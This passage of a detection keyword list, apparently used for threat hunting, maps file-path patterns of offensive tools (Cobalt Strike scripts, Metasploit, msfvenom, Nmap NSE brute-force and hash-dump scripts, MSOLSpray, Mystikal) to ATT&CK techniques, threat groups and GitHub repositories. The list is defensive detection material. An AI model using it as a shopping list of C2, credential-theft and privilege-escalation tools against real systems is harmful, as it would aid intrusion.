-*/Modules/Exitservice/uinit.exe*,offensive_tool_keyword,cobaltstrike,A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. etc.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/yanghaoi/CobaltStrike_CNA,1,1,N/A,10,10,402,78,2022-01-18T12:47:55Z,2021-04-21T13:10:11Z -*/modules/payload/*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/mongodb-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/mongodb-databases.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/mongodb-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/monkey.py,offensive_tool_keyword,monkey,Infection Monkey - An automated pentest tool,T1587 T1570 T1021 T1072 T1550,N/A,N/A,N/A,Exploitation tools,https://github.com/guardicore/monkey,1,1,N/A,N/A,10,6330,762,2023-10-03T21:06:53Z,2015-08-30T07:22:51Z -*/monkey_island.py*,offensive_tool_keyword,monkey,Infection Monkey - An automated pentest tool,T1587 T1570 T1021 T1072 T1550,N/A,N/A,N/A,Exploitation tools,https://github.com/guardicore/monkey,1,1,N/A,N/A,10,6330,762,2023-10-03T21:06:53Z,2015-08-30T07:22:51Z -*/MonkeyWorks.git*,offensive_tool_keyword,Tokenvator,A tool to elevate privilege with Windows Tokens,T1134 - T1078,TA0003 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/0xbadjuju/Tokenvator,1,1,N/A,N/A,10,968,208,2023-02-21T18:07:02Z,2017-12-08T01:29:11Z -*/mouselogger.py*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*/mqtt-subscribe.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/mRemoteNG-Decrypt*,offensive_tool_keyword,mRemoteNG-Decrypt,Python script to decrypt passwords stored by mRemoteNG,T1589 T1003 T1563 T1552 T1098 T1021,N/A,N/A,N/A,Credential Access,https://github.com/haseebT/mRemoteNG-Decrypt,1,1,N/A,N/A,2,111,39,2023-07-06T16:15:20Z,2019-05-27T05:25:57Z -*/mrinfo.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/Mr-Un1k0d3r/*,offensive_tool_keyword,cobaltstrike,Fileless lateral movement tool that relies on ChangeServiceConfigA to run command,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Mr-Un1k0d3r/SCShell,1,1,N/A,10,10,1241,228,2023-07-10T01:31:54Z,2019-11-13T23:39:27Z -*/Mr-xn/cve-2022-23131*,offensive_tool_keyword,POC,POC exploitaiton of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured SAML),T1548 - T1190,TA0001 - TA0002,N/A,N/A,Exploitation tools,https://github.com/Mr-xn/cve-2022-23131,1,1,N/A,N/A,2,146,48,2022-02-24T15:02:12Z,2022-02-18T11:51:47Z -*/MS15-034.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://github.com/cldrn/nmap-nse-scripts/tree/master/scripts,1,1,N/A,N/A,10,920,383,2022-01-22T18:40:30Z,2011-05-31T05:41:49Z -*/msf.go,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,1,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z -*/msf.swf*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/msfcrawler*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/msfpc.sh*,offensive_tool_keyword,msfpc,Msfvenom is the combination of payload generation and encoding. It replaced msfpayload and msfencode on June 8th 2015.,T1027 - T1036 - T1564 - T1071 - T1059,TA0002 - TA0003 - TA0008,N/A,N/A,POST Exploitation tools,https://github.com/g0tmi1k/msfpc,1,1,N/A,N/A,10,1127,274,2021-05-09T13:16:07Z,2015-06-22T12:58:04Z -*/msftest/*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/msfvenom/*,offensive_tool_keyword,msfvenom,Msfvenom is the combination of payload generation and encoding. It replaced msfpayload and msfencode on June 8th 2015.,T1059.001 - T1027 - T1210.001 - T1204.002,TA0002 - TA0003 - TA0004,N/A,N/A,POST Exploitation tools,https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/msf-ws.log*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/MsgKitTestTool/*,offensive_tool_keyword,poc,Exploit for the CVE-2023-23397,T1068 - T1557.001 - T1187 - T1212 -T1003.001 - T1550,TA0003 - TA0002 - TA0004,N/A,N/A,Exploitation tools,https://github.com/sqrtZeroKnowledge/CVE-2023-23397_EXPLOIT_0DAY,1,1,N/A,N/A,2,158,46,2023-03-15T17:53:53Z,2023-03-15T17:03:38Z -*/Mshikaki.git*,offensive_tool_keyword,Mshikaki,A shellcode injection tool capable of bypassing AMSI. Features the QueueUserAPC() injection technique and supports XOR encryption,T1055.012 - T1116 - T1027.002 - T1562.001,TA0005 - TA0006 - TA0040 - TA0002,N/A,N/A,Exploitation tools,https://github.com/trevorsaudi/Mshikaki,1,1,N/A,9,2,103,21,2023-09-29T19:23:40Z,2023-09-03T16:35:50Z -*/mshta.cmd*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*/mshtajs.cmd*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*/msLDAPDump*,offensive_tool_keyword,msldapdump,LDAP enumeration tool implemented in Python3,T1018 - T1210.001,TA0007 - TA0001,N/A,N/A,Reconnaissance,https://github.com/dievus/msLDAPDump,1,1,N/A,N/A,3,205,27,2023-08-14T13:15:29Z,2022-12-30T23:35:40Z -*/MSOLSpray*,offensive_tool_keyword,MSOLSpray,This module will perform password spraying against Microsoft Online accounts (Azure/O365),T1110.003 - T1553.003,TA0001 - TA0006,N/A,N/A,Network Exploitation tools,https://github.com/dafthack/MSOLSpray,1,1,N/A,10,8,734,147,2023-02-17T13:52:21Z,2020-03-16T13:38:22Z -*/msrpc-enum.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/ms-sql-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/ms-sql-config.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/ms-sql-dac.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/ms-sql-dump-hashes.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/ms-sql-empty-password.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/mssqlexec.py*,offensive_tool_keyword,crackmapexec,protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,1,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -*/ms-sql-hasdbaccess.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/ms-sql-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/ms-sql-ntlm-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/mssqlproxy.git*,offensive_tool_keyword,mssqlproxy,mssqlproxy is a toolkit aimed to perform lateral movement in restricted environments through a compromised Microsoft SQL Server via socket reuse,T1021.002 - T1071.001 - T1573.002,TA0008 - TA0011,N/A,N/A,Lateral Movement - Sniffing & Spoofing,https://github.com/blackarrowsec/mssqlproxy,1,1,N/A,10,7,682,113,2021-02-16T20:13:04Z,2020-02-12T08:44:28Z -*/ms-sql-query.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/ms-sql-tables.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/ms-sql-xp-cmdshell.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/mtrace.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/MultiPotato.git*,offensive_tool_keyword,MultiPotato,get SYSTEM via SeImpersonate privileges,T1548.002 - T1134.002,TA0004 - TA0006,N/A,N/A,Privilege Escalation,https://github.com/S3cur3Th1sSh1t/MultiPotato,1,1,N/A,10,5,485,87,2021-11-20T16:20:23Z,2021-11-19T15:50:55Z -*/murmur-version.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/mushishi.h*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/mysql-audit.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/mysql-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/mysql-databases.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/mysql-dump-hashes.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/mysql-empty-password.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/mysql-enum.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/mysql-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/mysql-query.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/mysql-users.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/mysql-variables.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/mysql-vuln-cve2012-2122.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/Mystikal.git*,offensive_tool_keyword,Mystikal,macOS Initial Access Payload Generator,T1059.005 - T1204.002 - T1566.001,TA0002 - TA0001,N/A,N/A,Exploitation tools,https://github.com/D00MFist/Mystikal,1,1,N/A,9,3,245,35,2023-05-10T15:21:26Z,2021-05-03T14:46:16Z -*/mystikal.py*,offensive_tool_keyword,Mystikal,macOS Initial Access Payload Generator,T1059.005 - T1204.002 - 